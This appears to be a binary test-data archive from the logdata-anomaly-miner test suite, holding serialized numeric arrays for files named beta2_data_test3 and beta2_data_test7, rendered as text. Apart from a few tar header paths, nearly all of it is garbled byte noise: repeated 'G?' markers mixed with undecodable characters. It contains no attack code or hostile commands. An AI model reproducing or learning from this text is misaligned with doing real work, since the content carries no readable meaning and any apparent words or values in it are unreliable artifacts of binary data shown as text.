tG?-MS6G?W2RT3G?gG?|S[G? G?͹-G?{W}G?(`G?bjcFG?쉼G?r3+G?-}%G?ꈂEvG?_Wq`G?w'ZlG?'?ĿwG? Bs^G?5G?Ӫ1G?.{sG?"R=iz?G?oO{x_G?3XΜG?ޗ-yG?#1i_G?j46G??"jG?:҅G?@eXLG?~xG?hŖ୭G?ۑ qG?ހG??MG?hAG?쉽q:G?̾ EG?"{G?߳nG?*G?o5oG?OEmG?>JG?U^~UG?Z5G?tG?!=G?H_CG? <$G?F*G?v] G?KG?ΜTG?q=G?DcG?*qQ)G?G?솠`G?,ӿ@G?PΊG?,(G?\ נG?ם:j7G?5PA G?ǜG?t6G?~G?O l$G?ďiNwG?QW 9G?~}G?4ImG?$ۋG? wG?[jG?S6G?:'G?MeG?H'LG?2/G?& Jj]G?M/NG?QG?pG?O<~G?AZG?冋~G?ˤOeG?N G?۳3G?&`G?`9G?}Y&G?N'G?OcjG?g}!SvG?ƴ;G?bJG?0<+G?ᾺG?% G?o<#\G?la0G?}~SG?2ibHG?W~lG?ޱfh>uG?uC G?wju%G?-A^G?T}G?↛Dm6HG? 
WwG?fw&xG?GC0G?oG?tu1G?9TG?zOG?wna0G?G?3G?ƒG?Vڀ-G?<as|G?e,8G?ڄSG?Ar.G?ˁS(G?+rG?$ G?D G?W5HG?eG?U^G?Tu-ȎG?q]{W?0G?ZcG?2,+EwgG?tvG?/zG?]'G?z6XtWG?܍QWvG?x/QaG?Pa{G?똦:C$G?v(ZG?WG?ǭWG?KG?p%G?2P1srG?ܨ`{G?uG?aG?)^lG?!j:G?, ^G? wG?Ϛ:G?eEkQgG?\v!dG?SC~hjG?ҴPG?RG?m@NDG?S~G?FMW{G?ЄZHG?ʓDG?#@$G?ךrU|G?7G?G?c G?_ƀYG?d˸G?v2dG?L7_G?v_=G??,DG?׆T4G?Rpw G?TB|CG?ˮWnG?w%n#G?NN]EG?gG?lG?˸9sIG? 6(G?XG?MEG?lzG?gkK-G? FrG?܊G?sն&G?(|)-jG?kLG?ǎG?`wqG?JO3G?u`yG?DG?A߇G?ޓd:QUG?Ae@G?b@G?>0G?srG?QN1e](G?%>7G?ExG?yG?%(DG?v>.ooG?Gki]ѺG?3PYuG?R*3G?ȎG?=kNSG?o6QEG??G?Q)G?>~HG?պ4;#G?G?j G?dn(OG?s(G?dv/G?a g>G?ZgG?;2eG?_rG?26ϙG?BG?`F*zYG?q1&D3(G? ~G?1G?1ƉG?C@DG?iƑG?9qG??G?>~`Σ/G?MzG?jD G?DV0G?[|0G?2 5G?چ̒hG?j氰G?gMtG?ՐWXG?܏.G?/ ]G?ɺV@G?ЎwG?ݟrG?>eG?⩹}ՠG?aUG?PjG?:G?'J G?u1G?^ r^G?G?yG?0qAG?5!%6G?-G? (G?u&G?T$RVG?+^+:G?ͭl`=G?lG?IRG?ԾG?vќJG?ȿG?]G?yCoG?1>O*\G?ֈ2LG?ݕzR0OG?cY^qkNG?YG?)ucG?\I|G?ȅG?G?wG?t|jG?VJG?G?xgG?o`G?(G?TvhG?ҚwCG?K0G?+VWG?ܯXG?Rp G?̧4nG?G?|" G?.nܯG?ȅy؅G?tPs^G?\qO2G? tG?-@zG?0'G?Z*G?q8w?G?R lG?%VG??n",G? 2uMG?h}\G?[G?VQӦG?怿z=G?烈uG?PMG?G?^mΔG?#7G?:g_ G?ժk"G?LG?pyhG?@ tG?G?T AG?h8G?5xQG?ʑGG?偬G?qDG?($PG?د:G?Wp1G?򭫽+G?цG?l0ua}G?OG?a'aNG?&~yG?2GG?"G?s/PG?W)G?ƺ=G?G?ά=>G?T~G?M G?oueG?+G?TG?3s|G?ݿ=7?G?dG?̞G?G?sE(LG?e G?Y]G?x G?FqG?JHG?}3LG?0- G?#UG?Kv:G?f?G?G?׬|G?蜎hG?'$2G?S~WG?3%G?L%U_G?~8}G?m G?qG?9˪-G?zK]G?g>G?ū],G?܅-G? sG?NGG?AꍽG?0<=S4IG?_@G?GfG?yG?i/}%G?Ӝc…G?')1G?.ۍm҇G?wDG?ENKG?bKmSG?WwG?FƩG? >>G?ngG?B/PG?G?0 =)G?౗zG?G?JG?9X0 *G?^bG?Ը)G?OG?TJG?ٌG?6mo%G?Ox}G?BDG?e NG?ŲŷG?*k#=G?쬨JG?4B{G?YgG?F G?`bG? Ux՛G?/țG?"G?BMG?I&xߝG? )כG?P G?s)G?t?$G?wG?S/G?쿳 5G?)G?tx0G?G?{姥G?tLG?*!LG?Ό=OFG?_wG?Msvj>G?:h_G?nzG?9ˠ'G?;LjG?CzhG?iRG?V&g{G?IJG?@iUn G?"G?MBG?u< G?4hG?G? JjG?WG?K gG?Z bG?#wG?-1rG?XŒG?|qG?/G?0٦$G?|#y;G?[G쎻G?q|v|G?-isYG?4G?Vd iSG?=G?)G?yF:G?ˣG?7=1qG?蘘=G?aE G?NG?%=G?XG?HY?G?jG?Ӕ+e\G?%rG?y&*XG?=G?ưyZG?rG?JA)5TG?gG?6lG?lOkiQG?<:i#G?]8gG?{‹G?rnlG?q4MG?$>iG?Ą +>G?bwrG?OAG?绺ǟG?Ԙ'G?'nYG?N/G?&*G?aqG?]:xG?GbQG?# :G?8[aG?e{|EG?ξG?ѨJ.G? .N+IG?йV(G?$G?|JG?!XGG?AUG?=~G? 
YG?VOG?#G?{3G?xnCRSG?UG?g'AG?tG?|JG?<7ӘG?ϫ?G?ẘH;G?)G?M}sG?ܸ5G? G?4!ȜG?խw0\G?06G? (G?stjĊG?@G? ETG?.MG?> D3G?[l0(G?"G?5ÀG?/NZG?vG?hG?fqӡ~G?&pE:G?`'G?jG?SMG?i*G?8G? lG?̶G?8 LKG?t#tG?soG??c@G?,#G?滺 rG?/G?8G?c)xȂG?*%x G?TOjG?G?_84%UG?#G?,7pG?gO3,G?-DzxCG?ǧ<5iG?hGx&G?Y RG?U$шG?d>jG?2ZפG?ĹG?UH7G?bT'`@G?Jhqs&G?noTG?ݼVhG?|YG?'i1>G?g2EG?vG?o,4#@G? dK1%G?QG?99G?PpG?e(G?L;րG?fG?Z~G?2(G?j:DG?-iG?8OSnG?`+KEG?DNG?#DG?Wj4:0G?ݰ5mG?G?UMG?G?L/wG?{z G?1ZG?+;ڷG?]@G?ExG?ь\G?DٽnG?xQG?X.G?1ByG?`H~TG?= nG?FCa9VG?9&G? gG?l RG?uG?IG?cK=1KG?9"yG?hZG?/ >G? ViG?$1G?2G?/]G?< CG?mGG?]XCq_G?$G?K9 \G?.ɭHg/G?G?:N|G?w^ pG?YAūG?D5G?WL9G?^G?댈mgG? G?셮@@QG>pQwG?ւ0cG?hlG?8&wG?mG?V饊G?[d G?T 4G?ݓUG?ZX`G?ZmG?K_n5G?_dqG?f̈́G?ٔ*_DG?=-9G?ҚSG?TG?y"\`EPG? ]G?,4?G?*#G?Þ~0_rG?jwPG?T)zG?1gG?_G?IvG?2G? =NG?B6G?QU<G?ւ<&}gG?28+G?Xn8G?ʦv'G?FrrG?bLG?o6G?xPG? G?G?^G??pG?7m]G? 4G?h;G?Զv: G?!wG?ꡩ'`G?S?G?N-\27G?Y$NG?Uc G?FZ6fG?8 >}G?{U"G?-_[G?x҇G?]>G? ߙG?85{^G?QG?NG?:+3G?oG?/gG?}5BG?6G?ї bpG?sb^G?r^g0RG?ÜG?vyG?ioG?2C'G??G?4iBG?nG?:H)5G?qG?8TG?ɬ2G?͈G?~0wG?|1G?ƚ*GUG?:EG?H G?7S6G?G?i)G?/G?֊: G?XG?ˆwG? G?G?%!`G? G?!cG?SG?S1G?7(}G?ga%G?̨G?G?򊤯NG?ʾG?후mQG? pG?^є QG?vJ}G?ЕW8MG?MZ)G?xG?SG?T G?XJAG?NG?#рG?v|x1G?ؗG?S=2G?UmMiG?IwG?Ari8G?놿G?nKStG?z[׊G?UYmG?/,G?7G?[skV>G?ؑWG?ȲG?,١|G?~.HgG?HuG?;r'G?TCG?Oh!G?壑NG?O犝G?F\G?;G?\~G?[u-G?䝨fsӜG?:4G?P-G?N*!ðG?ڢLG?]0KG?)ͿG?YG?z pG?,TG?Yp$G?ػ\G?nG?ӵsVG?iG?cXyG?1jڢG?dG?JA0)G?>qG?#)@G?٩SmG?9 6G?|$yG?ʹn*G?>G?tqPG?ʳ];G?Q!G?є[ݢG?=>G?lqG?g+]G?ͿyZG??#jGG?!nG?ԨeG?~tG?*nS#G?v#cG?j='G?<~GG?۞G?=3+G?/L0G?OhxG?beG?AIG?쓒G?PG? $MG?-JG?52"AG?R R=G?{,9 G?K$l[G?KG?PWU L+G?6G?N$ɄG?ʐqG?*TG?Zg"bG?Uҗ G?xK2yG?7]G?xG?G?@LG?%G?=WG?n<҇G? )G?|=? G?ߝAhG?xJG?kPH]jG?=GڗG?#S%G?޾[aIG?ҿJi^$G?c)G?wŸVG?Lh2G?.G?(6:RG?*G?T6qG?&EhG?N@ G?%GmG?:G?苾TG?̖rvG?c}G?t YgG?0M)JG?>JOqG? wMG?ػM9,=JG?5G?Q}G?)TG?M/.G?gG?5ecG?t(G?gڅ1G?&|G?2EG?M.4TG?G?e5jHIG?6|G?VB$G?OaMӄG?k]G?VUCG?(dKG?Jm G?v7lGG?е,fG?ܹG?0G? 
G?r7DG?\"G?젳0&.G?_xSG?߄pNG?YG?ųѕyG?Qk[dG?OXG?9y\EG?G?G?#n;G?ϿG?ze](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta2_data_test3000066400000000000000000000432761500476301700275260ustar00rootroot00000000000000F](](G?/J>G?5fO2G?n1G?)pS\G?F6G?蝀G?MѰG?>4jGG?jQG?7zG?<~G?]S>7+JG?~=$uG?0>6lG?с)"G? eG?q |%G?6G? 5G?Ŭ[W G?oҢG?BG?d8G?VJ$GG?P-G?3:G?GG?jL4G? G?43j{G?a5hG?֗? G?>sXG?̇G?tgKG?m-\G?}G?B G?r6wG?G:dG?呅+UXG?{G? G?DG?hLG?yOSG?_Gu`G?S AG?⎦++G?[?)9G?ǶzG? @0G?ywG?x {G?q\9G?W5G?eqG?G?n'֚iG?3Xy\G?ȡ[M)G?S G?R@^G?@MG?fG?266G?hҡ,r+G?"G?&}yG?l8 qG?K<G?Zf3rG?G?Gc5G?kG?wG?׺TpG?S|[tG?oc‹G?  G?|אָuG?V6@G?{lG?ԅUG?`G?J:G?7A%G?zFG?+EBG?"BȶLG?vNG?xG?K#G?# G?|G?SohG?UXeG?3#IEG?ƧG?~ ԋ(G?$oBG?TvG?#.G?n8R0G?r;/G? .G?.G?픗ŮG?'+G?8&-G?m@#G?FG?m9G?>2]fG? m582G?GR)G?i'pCG?|SG?ӏG? >G?33&G?@LG?!hG? xB'G?:3dG?G?5@G?bbBG?cAG?ýhG??NEG?ۊ$G?,ػ_dG? 5G?yyG?( G?,kIGG?&G?irG?0=G?')"G?gx~G?^*X G?9]G? BG?d=G?>>qG?&BG?~5G?d/G?Y1ԖG?iƜ3G?篚|G?o}GG?iP /G?s%f G?6eAG?vJJG?6YVG?;G?:}'G?P|G?c2G?ᐧ,TG?jG?\oHG?@蔡'zG? }G?qoG?BmG?C 'goG?w蘊G?{G?!5G?vC5G?ȃG?TA07G?j=G?aE@k3G?נI뛢G? c[G?{B/G?-*G?P\ G?2 XG?rGG?iz9G?]G?'7'tG?MݥbG?2wXG?hY}pG?18I{G?aMd6@G?AGG?RC;&G?C-cJG?SH3G?Z~EG?rjG?몝O1G?Zܯ^G?6$G?OItG?v/ccG?܉X5G?~| PG?z$G?JNGG?}QwG?jlp.YG?'`G?o&G?41G?ۏ G??f6UG?i)qasnG?v\G?@>G?9 G?V G?յG?ԌަG?Sc"!lG?f'LG?mA?G?]k6G?橿 WG?[ G?&nG?"FG?N3G?IV4G?ї2OG? pG?QQcG?[`rG?xTX5G?抁2D+G?c1G?8'>yqG?#NKwG?y" G?ZnG?RKDG?PpcG?*؏;G?t(G?ijG?dc%G?]1ŸG?q'G?w6M{H-G?.+0G?kEEG?_ G?{{vG?'G?^I\yG?9s`G?kYXP^G? j VG?@̼BCG?;!G?!4 G?ZK2NG?s|sG?KCG?DqSD:G?_IpG?M*{G?|PG?j.*RG?-;G?;i>(4G?XG?6,G?Z\&YG?@UM8G?y,)G?m@D~G?@3kG?EWHaG?3{G?+bI8oG?ߖG?yCǵG?G?aOWG?.:%G?,L}G?x-)G?FUxZG?߁G?˯qɫG?䲻AqG?u:IG?ꉶv_LqG?jCfPG?~3hsG?G?~&G?#+jG?A_G?jUG?.F<G?l9G?j7+ʅG?愚G?VG?ں*G?qAG?Bp ?G?顨ܐ`G?ė*仳G?|"6#G?s6#RG?"[ G?L%G?=z=G?yG?[ G?ϔf`G?뱝4xG?տiDG?=hG?UJK G?KVUG?CeJ/G?>DG?~dG?ZˉG?O Ml+G?c`6PG?Z8mG?̲{NG? G?gf@0IG?@G?U:G?hG?݌ØG?슫8XG?btG?%%YG?nG? 9G?"tG?Srk0G?-xG?@YG?U^dG?žBG?&!G?j9G?lgG?9$3G?SG?0G?)G?B`:*G? 
x1G?sFOG?8ݽG?~#HgG?M~+G?hlG?cG?]%MvG?UG?ʃɖׅG??CG?ᳳڰ>G?T\r/G?QXn$G?A0uG?铬5G?u]X/G?ۏ=ÏG?-/ԼG?:bG?)'G?L^;$G?G?uع#iG?@z8QxG?Q-G?ܫzG?G?:#~G?pNG?]\}G?&G?jEG?b٢m&G?m{|vG?RD1G?nG?NG?fG?gG?F\1G?alOG?خ K'G?/'hG?lg@5*G?ph˅G?cG?rmG?RץHG?sst:G?CZYG?'G?8w?JG?:u7G?朮V @G?ꀢwG? OG?oCrG?銗 9G? fE:G?+`"aG?AXG?6adG? сG?̎G?`EG? ` G?H$G?J&EL#G?1pG?kzG? FjG?πgMG?9 oJG?'G?~G?kǼoG?E_b(G?i G?E{"P)G?pIG?v|TG?G?n`G?烔]DžG?[G?l?KG?FgG?;;=oG?uLRG?O2G?laG?^黶bG?[IG??SG?پG? ޕG?㣲z0G?zpG?wWG?+wNtWG?q<9G?;!97 G?BzG?vjRG?㾙G?2/G?/G?.G?槭}nG?`Gi8G? 5G?ryݠPG?1r]kG?9#ի G?"G? G? 1%dG?ှ3u`0G?`NG?DݧG?能#G? $1G?꽟/ BG?SG?pG?r7G?!XG?o~G?G?OG?; G?{G?+iG?SȻuG?IeG?JiG? OG?3G?<: G?J oqG? ~ G?fG?O4 G?7'HG?rfG?LTyG?-'ۼG?{G?uBG?ݬDGG?G?LG?DG?żG?lG?>oDG?ƱG?|sG?VG?~5\JjG?@G?[ [G?5n8zG?(gitG?subG?aG?煳DHG?8G?)z7G?}y>yG?c/;KG?G?bŒG?u `G?⢥+G?2G?ԃG?o'WG?<#HkG?鳇GFgG?Eƿ7G?0}]G?F;)G?tcG?öYAG?QG?S6O:G?I yG?{;IG?SG?6tG?ۿlG?;ߧG?3/G?PrmG??gQG?RsG??G?InhG?F_ohiG?? G?d%7G?/G?&4CG?ZO1G?8&#GG?처.Y$!G?f-tzG?'&|jG?rc L G?o5G?驑BJHG?v=`XG?hG? 2`8G?xXe]G?WqCG?'G?VP G? "6G?R!,;/G?~d)G?큡ԛG? G?НǼ/G?A F|G?izG?yHG?j}UG?g0G?wO G?CB>G? ݔͱG?BWG?AfZG?觠|"G?hҠDG?74&G?PeG?G?ISG?)m2G?Qh6SG?qlbG?)1QG?.>:G?X*aXG?i= G?x-eG? AG?pṩG?qsG?{VG?X1G?ܜG?+G?g2UG?:QVaG?s0,G?5kG?@;G?gKdkG? h|oG?,*G?fG? 4iG?{tQCG?{Q\G?!oG? E MG?H]nFG?71G?+FTG?$$8G?"#xjG?법 5G?8޸MG?3ǬG?Po9lG?G?@\kG?僠~SG?(!* G?F^+^ G?E1LG?"ѽG?M{2G?t^NYG?%&mG?'s/G? G?!G{G?IG?[.G?NbG?7:UG?G?xG?x_"G?WG?vϤG?%ʞG?=iigG? (~)G?dG?k{8G?* G?wkG? G?BqQG?>;ZG?ct G?탱 G?o[#G?L^ G?@G? dPG?:|?G?X \G?\̈yG?kYG?o0UG?s]ۮYG?盼;.PG?۩iGG?&Mc*G?[MuG?̑3zG?svSaG?UAG?pcacG?ݿMZG?MG?vG?_/ѳG?#9G?B*G?bIG?VSrG?UåG?)*euG?] G? )g}G?k8AAG?ބ&G?_̤G?J"kG?JмG?=`G?gG?)KgCG?6y% G?)'G?^G?yWG?v>G?ȡG?G?8£G?|G? a(G?ꙏӓG?s1G?'nG?ݴgG?~ G?ݝG?JsG?KG?O9VaG?[Y4%G?وlr#rG?1bG?G?G?+eG?P2ZcG?!>j_G?`QG?/\G?ɛG?tG?)uX(G?u,NG?OoG?ꃊG?0i-G?<ߩz{QG?{JG?7ȭ8G?W;G?!)G?ݿ쇥G?9 G?:aG?W~tyG?(*F5YG??sG?.G?.ZG?yG?Kt^AG?꜃wVG? 
P$~G?G 6vG?CaG?qei[G?%̻RG?wG?# 7G?G?S5;G?TIIG?1kHG?%,gbG?nx8G?CՌmG?¤HoG?5?0G?T41?G?g;+dRG?84G?dhh\G?G?vIG?.^'G?ۇ^S~G?G G?'rG?wvG?T~VG?'%G?6G?]{yG?B7,G?BPG?jwuvsOG?FhgG?:aOG?_}-G?j|G?+reG?>`=G?k&G?G?|n%5G?&GkZG?YΚG?SG?<iG?kP] G?{eG?)6G?g`FG? { G?CG?[G?eG?/xG?贿04c;G?%yG?{O|G?v7}G?`q"GIG?#FjG?ATG?нG?dG?wGVCG?!pG?ȫt)G?咯G?3kG? *Z[G?\1G? fG?+\ G?wCG?֍| 7sG?eYBG?mgUGG?/NG?vLbG?TG?Ww!pG?^3G?OX}G?݁ZۋgG?N!lG?w5~G?Ľ0G?꒔ߖ4G?clG?cG?wCyG?J . G?뫾4nG?}HmG?_P<@G?e%X#EG?q+`xG?ZdG?I|G?줆oNG?0 %GG?+kG?0ՠtG?Co G?)$FeG?^D%G?FG?k6G?>ՐG?G?/_Q#G?f^G?nG?/M8-TG?"ӹ{G?鎗KգG?KfG?*[/G? G?}mG?ܽG?i!tG?$eyH1G? rewG?[zkRjG?莣QG?ԏ wG?S YG?q:ƼG?Cn#4G?}n?G?%vVG?C_%G?[x:G?;UK G?E!G?+ G?هG?ibÎG?Iĸ%G?^CG?CG?JG?",6}G?,C ^G?:)G?ȫ%7F G?eqhG?pNG?4&G?C/|G?<$SG?餥NG?AG? G?̑G?ZiWG?j JG?5DYyG?V))G?e\G?I< G?vjG?@CǑG?vRP'G?cG?CCvG? Q G?5-2VG?1|G?/G?,$zG?嚽.G?ڥPUG?.ngG?D:G?vG?/iG?VճWG?|釶G?h~ UG?G?ZRG?E s.:G?4VZ(G?ZcsqG?2U G?aJG?1ƫG?9G?WV.DG?waėG?Ӫ-G?h<⪹G?XqG?XbZG?㟻`G?kpG?傂OG?E{}G?MzG?Y4)G?bgOG?XG?DفG?LBvG?P;/YG?-vG?nZG?WG?xI-XG?E QG?T9OG?LhpG?AG?U+VG?ޛH+xCG?ꄓԸG?bG? nhG?3G?qfclG?G?傑+kTG?SG?V~G?qTG?P~G?q1G?혺^zG?V џFG?d G?1ՙ"mG?ߞ_xcrG?OdG?CZfG?t-l8G?)CyzkG?wSoՕMG?GIEG?t=}zG?GG?JCG??G?mR$G? toG?]G?WFmCJG?$%zG?h[G?:aG?Y0*G?zI)G?4G?Y,@G?4jG?n[G?{G?TͧZkG?6{G?=>z1G?8nxG?柜}EG?ۡsA@G?kôG?Mo "G?9G?浏ңG?VqG?ۑq$G?ۆۣPG?ꞒEyzNG?͢G?_j`iG?oopyG?[EG?>&~G?1G?4{mG?|,(G?U.G?됌kzG?yهG?XȤNG?睁YG?1} G?^tG?o@G?-KnR9G?漀K2NG?xRG?=>G?I 1G?ꋗ' G?ߨG?iNG?[)G?OȸG?SQG?~G?ۖG?KG?XکG?e )G?駎G? limG?AaڳG?B0{3G?\, K`G?ZnG?}5G?&b8 >G?DS+5G?"bG?u)VG?ڱT7G?keG?XG?fo G?טHG?Es.NG?tG?SxDG?YG?}@gkG?nvXG?iG?$Y=,G?-"&G?|hG?G?UhdxG?;S#G?tG?vG?SG?Xyױ}G?%_#sG?oÈG?(Q,G?G?kĖ%G?!p#G?ϵ [G?""G?EfFG?ߜ :G?AnG? O*G?lnlG?.&J,G?L9G? yBG?uPdG?:fp{EG?SVG?sݮ]G?mG?\=mG? G?OG?,KG?䯅(G?G?94 9G?5G?(G?;Y~G?^,ХdG?4=dG? IG?"2G-G?胤40G?#G?ⵋJ~G?"G?~ >XG?X ^G?okTG?䔁ڮkG?%{gG?j~rG?4G?cg]$G?f/pf4G?C7G?HSG?HG?b|JG?.iG?dtG?YDW:RG?%FIG?*"LG?S,@K?G?$0G?ѳwfG?ʛlG?*OG?hieG?B9$2G?exQmG?ӕwG? G?@ucG?oڨG?鑍AY}G?N}T $(G? }G?hGSG?P G?"%6G? WG?̣ 5G?2G?HdJG?9lQG?(ӌ1G?Ꟙ69-G?cG? 
/e;G?U`G?[?G?OTVG?졝 G?9az4G?1G?uG?E]TG?R=G?L&@'gG?#&nZG?8JeG?n!LG?@"G?{kG?f@:MG?䜐# ,G?6eG?< G?=qG?Bzo>G?42%yG?ǕG?& G?"G?2 G?}G? jG?ZʤG?;OG?`$*G?TG?)G?NG?pM[G?**$IG?4G?~̈G?@HG? EwiG?56@iG?ߨEGG?HeZG?:!fG?U;؊G?ܷG?1~)G?[=G?ꤻ"G?Jܞ?G?qG?P/G?*tL^|G??8vG?@଼dG? cb{G?9P*G?[G?Td4#G?:"~G?ntEvG?b.pG?b8|4G?7hZ7G?'?KG?--G?UݧG?[1_xG?R@G?񼄞yWG? yQG?۪d%>G??k ZG?K^tG?х)G? $G?ǮG?I4BdG?HX G?{{G?팞yG?G?%߶^G?-*_ǛG?GG?#MG?= wG?t*tG?ѧG?auMG?sj]4@G?2G?QЇ;(G?䋍X[G?kG?"LG?wx;G?ԗ>G?䗹^G?$eG? =#VG?,G?k‘G?`G?"q OG?'CsZG? 5V*G?x, s\G?n:DG?}"G?k ;HG?ۙ^mG? mc=kG?DDG?fG?ÎVYLG?DBG?⻑2gG?+7eG?qI{لG?4I5G?FG? sG?êG?]*G?gxáG?E$G?|rG?ߎ*pG?mnꄚG?2fkG?8E*G?:vMPG?o&(yG?Hi\G?eG?⌺9G?:НG?aVǑG?lu36G?XBeG?fG?wY|AG?1̀YG? '-G?E,G?d* G?h.G?JjG?ٮG?&C\&G?lpG?ICtMG?c- G?s3e8(#G?HMOtG?_G?bZ~VG?3KoG?9SG?ӹG?~G?kJ+G?C3BG?ܬG?b(uG?AC{MʒG?kJG?5u/G?nK G?~PDG?:G?a=hG?⮰G?MKhG?PEG?WCG?.G?vaG?鏉G?G 8G?X$4G?A.G?6M &G?umЭ2G?9छ4cG?fBG?ErgG?^Bs4G?PmG?_"lFe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta2_data_test7000066400000000000000000000647021500476301700275270ustar00rootroot00000000000000i](](G? ڱBG?~`*hG?G?\pDG?d;?G?⧡iG?^G?WHG?S%G?0z;G?fbG?ʦqG?uv9G?GwbG?,)]G?)c!G? bVJG?7@G?X4G?띆 aG?GYG?snG?b2@G?4EG?QG?>n i9G?mMkG?1|G?*/G?U9G?;vQG?vLDG?CUB˵G?@.3G?l(hG? (OG?r,?IG?&YG?|GKG?z1&G?F3,G?;80G?FkG?AX sG?Lmy G?'F@G?hSe4G?tkWG?p5"kG?`rOG?殹aڲ G?k5!G?i 困G?9gfG?ƺAG?Љ#ZG?h'4G?9ѽl1G?YhG?A< PwG?[NG?$_G?F"YG?6G?SzSiG?ZvNG?=sG?ㆼf4G?-VG?&4E\4vG?KSG?7 qG?ZG?R7BG?KNG?51G?*cޅG?\v!4uG?'+PwG?ދ G?Y~/nG?꼡k7sG?xexG?TR[G?d4И]G?;G?Ѣ.WG?G? 5G?@G?DC7G?rnjG?nEleG?DhkG?9:G?E[*G?twG?no6G?%'6G?SOG?h);G?c?ՌG?~G?}OG?6]X%tG?0soG?tG?hv G?qG?G?[&NG?4*G?zaG?{G?)G?ɸpG?EG?S>ޮG? 0~G?rkfG?6G?R{G?Z}FG?5)SG?;\şG?5G? ؆uBG?%CG?澡 G?쁳G?}(sG?2u+UG?tΊG?!>G?ݦd)G?EoG?1  TG?F=G?-eG?VL3G?#G?֝G?| 31G?Iӳ}G?ъ PTG?,,'G?验-bG?qG?R'?G? ?SG?`TG?9G?恼G?H ukMG?Ti}G? ~efzG?ts UG?G?K1G?ûG?zjQG?#TvG?]/0G?1aȉG?m1^G?sz}G?嗔GG?'oV7G?}#o_G?dVg1uG?飅G?5ʐWG?SD^G?ڡG? G?!{XG?de~=G?\G?ʜG? G? ( G?G?o~G?.KG?NG?C{oG?O>G?y3G?:XG?u LG? MG?(G? 
G?}OG?➘G?N:G?;G?oG?84G?kӔDG? G?<%G?搢$G?vtG?_kMG?:H!G?ª".\G?>G?%D G?բL'G?B$ `G?Pؿo+G?c\GG?-dG?C)+G?/^+OG?GȦ5G? UG?qp/ G?"G? G?a׺>*G?+Y 5G?'vG?깔uG?={4WG?zKvd4G?7>IG?BZG?8;1yZG?RJUwG?h4%G?ه&ae9G?߷G?gG?3*G?&_^~G?҆ϬG?zG?apg+G?G?WXkG?ۈG?2\sG?LiUG?/(xG?)T_G?ׯJG?ڵQ\G?G?-zkG? %hG?\JG?}#?G?嘵G?73G?TRD"XG?w(šG? 8G?[3G?@LG?DG?8R G?㞺=xG?PG?UKĐG?d8G?g<&G?AG?5a0ЅG?s9WVG?8$\$RpG?`o{G?G? _G?߰JVhG?7x,G?L|G?;GG?`^Q@G?"5MG?,gG?+ G?wG?(G?^^GG?؝S*GG?޻_G?`G?}loG?4s`G?ԸQ^G?mwG?͊G?~j!G?$GMG?DA #G?}4G?T8[G?4i<`bG? {,QG?,cG?ٞ/G?TSfwG?xG?Ef$9G?_cG? SjbG?OV3G?ԌG?QG?|52՛G?_tJG?e/[G?67FG?;bG?{G?wG?+ةjiG?}6}-G?IG?aG?kkHG? G? nPmG?aG?I6ޢG?dajG?G?{zG?l3G?xŬG?6؏lG?$rBG?\st.oG?8 tG?4]G?`~tG?^QG?`MyG?QFrBG?@?G?PFG?N,JG? G?:/ZG?A{G?1 (RG?ݫ*f^G?滷#G? a/@G?QJPG?Yn5G?^PG?CA]G?.ȑG?uG?+PBG? 2AbG?yRaG?N"qG?j*>G?B:NG?-=G?bG?yG?謨GNG? uIG?#*ؒG?>&G? rG?0G?2pG? G?2<%G?\HwXG?jXtG?ՠG?G?u#ҾG?KjLG?`G?(` G?u0G? ,G?hG?{渓G?NuaG?: G?hG?)* G?P?G?YgȇG?EG?G?X>nG?ꖘQG?h`G?詽ňG?cȥXAG?*|kG?G?)R/NG?袕y G?}5OG?}D[G?B y]G? 4WG? <\G?̝G?;`:G?S_OG?]_/G?&F!G?]BT(G?l-G?BExG?OKG?< خ,G?stpG?|G?P`MG?Ne,G?''*G?}G?{jG?$(֒jG?~05G?Fo.G?duG?DOG?jR*AG?{aG?ma_wG?ʒ{yG?VAG?yGLG?Ꮏ~;G?`^n5G?G?Z1!%G?apq7G?cIG?ŽE G?a4oG? j6G?U eG?;\m'G?qWG?$ 9_G?`RfG?ë%G?5G?ymG?@uG?IG?UFG?J$aG?~{)G?ZiG?xT3G?G?U ^DG?[FG?s{0}G?eL l]G?D7eG?UG?])G? 96G?%5ݴG?b:yG?)_ G?z/7 G?e G?T aG?6eĤ| G?UG?⊶G?oّG?SG?>G?ݓ703G?*%?G?OM]WG?6FG?3~<_G?M98G?x*bG?xAG?K G?0KG?쒶S@G?鎪G?іG?0yG?\;G?⸚4`G?išG?οBG?鏐Ӣ-G?0{;G?!Y -G? 䩗MG?\G?bؤWG?S]LG?trV G?MJ=-G?ye^Ae(G? G?#X^G?jkG?sɏG? 뜤ʆG?9\$G?oe+G?>G?xͳG?tTBG?G%IG?n}%G?])*KG?˦P,G?$u8G?Zg;G?{~vG?0ހPG?RvG?kG?P}xXG?:G?;:DeG?G?\,&G?&FG? DMNG?G?yG?YkG?0G?aN|G?(G?-TIG?ys4IG? FG?C"m0G?`h}G?58.G?ȱ(,G?\G?)(0G?GG?ls'G? 2G?k&G?aG?CG?G?Uxh0G?#`G?ۂ~MG?/0VG?҈)G?ԩߒvh G?~&G?R$7|+G?c(G?Qd8G?/G?jIHG?Z~G?w|SG?mWG?(W2mG?̪mG?SIÜG? T-{dG??-=G?f$;5G?麨t^!G?|f>G?"zdG?댞1DG?YG?g@RQG?偂LmG?U SG?g޷3G?RG?枣@OG?|G?%%G?zG?~!G?W'&G?3yG?ѺG?MG?UwG?3LӏoG? }|)fG?ş G?ɓ|=G? G?@I_G?AG?fG?= ϋfG? ÐG?/:nG? =G?VG?㙝%G?G?IG?Lz-G?1 G?jG?IwG?شeL7G?ꐯG?<\3G?cG?P!4G? 
